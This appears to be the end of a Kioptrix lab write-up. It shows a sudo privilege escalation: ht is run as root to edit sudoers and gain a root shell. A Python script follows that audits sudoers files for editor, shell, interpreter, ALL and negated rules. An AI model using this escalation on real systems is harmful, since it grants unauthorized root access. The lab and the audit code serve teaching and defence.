loneferret@Kioptrix3:/$ export TERM=xterm
loneferret@Kioptrix3:/$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:/$ sudo /usr/local/bin/ht
loneferret@Kioptrix3:/$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) NOPASSWD: /bin/bash
loneferret@Kioptrix3:/$ sudo /bin/bash
root@Kioptrix3:/# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/# whoami
root
root@Kioptrix3:/#
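The second `sudo -l` shows why this rule is equivalent to a root shell: ht is a full editor, so running it as root lets the user open and save /etc/sudoers itself, and a `/bin/bash` line appears. The `!/usr/bin/su` entry adds nothing, and sudoers(5) warns under "Limitations of the '!' operator" that negated commands cannot be relied on as a deny list. Below is an added audit script, not code from the page or from the sudo project, that parses user specifications and flags exactly these patterns: NOPASSWD or plain rules granting an editor, shell or interpreter, bare ALL, and negated entries. The risky-command sets are a small curated assumption rather than an exhaustive list, and the sample sudoers text is constructed around the write-up's line.

```python
import os
import re

# Command classes an auditor treats as equivalent to a root shell when they
# can be run as root (assumption: a small curated set, not an exhaustive list).
RISKY = {
    "editor": {"vi", "vim", "nano", "ht", "emacs", "ed"},
    "shell": {"sh", "bash", "dash", "zsh", "ksh"},
    "interpreter": {"python", "python3", "perl", "ruby", "php"},
}

TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|"
                    r"NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*")
RUNAS_RE = re.compile(r"^\(([^)]*)\)\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")


def classify(command):
    """Return the issue class for one command, or None if it looks fine."""
    if command == "ALL":
        return "all"
    if command.startswith("!"):
        return "negation"          # sudoers(5): '!' is not a reliable deny
    base = os.path.basename(command.split()[0])
    for issue, names in RISKY.items():
        if base in names:
            return issue
    return None


def parse_user_spec(line):
    """Expand one 'user host=(runas) TAG: cmd, cmd' line into per-command entries."""
    line = line.strip()
    if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES) or "=" not in line:
        return []
    lhs, _, rhs = line.partition("=")
    lhs_parts = lhs.split()
    user = lhs_parts[0]
    host = lhs_parts[1] if len(lhs_parts) > 1 else "ALL"
    runas, nopasswd, entries = "root", False, []      # sudoers defaults
    for piece in rhs.split(","):
        piece = piece.strip()
        m = RUNAS_RE.match(piece)
        if m:                          # a runas spec carries over to later commands
            runas = m.group(1).strip() or "root"
            piece = piece[m.end():]
        while True:                    # tags also carry over until overridden
            m = TAG_RE.match(piece)
            if not m:
                break
            if m.group(1) == "NOPASSWD":
                nopasswd = True
            elif m.group(1) == "PASSWD":
                nopasswd = False
            piece = piece[m.end():]
        if piece:
            entries.append({"user": user, "host": host, "runas": runas,
                            "nopasswd": nopasswd, "command": piece})
    return entries


def audit_sudoers(text):
    """Return the entries from a sudoers file that an auditor should review."""
    findings = []
    for line in text.splitlines():
        for entry in parse_user_spec(line):
            issue = classify(entry["command"])
            if issue:
                findings.append(dict(entry, issue=issue))
    return findings


# Constructed sample; the first rule is the one the write-up found on the VM.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
backup ALL=(root) NOPASSWD: /usr/local/sbin/nightly-backup.sh
deploy ALL=(root) /bin/bash
%admin ALL=(ALL) ALL
Defaults env_reset
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']:<12} {f['command']:<24} runas={f['runas']} "
              f"nopasswd={f['nopasswd']} issue={f['issue']}")
```

On the sample it reports the ht rule as an editor granted without a password, the `!/usr/bin/su` entry as an ineffective negation, the deploy shell and the admin group's ALL, and stays quiet about the dedicated backup script, which is the shape a least-privilege sudo rule should have: one specific, non-interactive command.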
Woot, again! Thanks for reading. Happy hacking.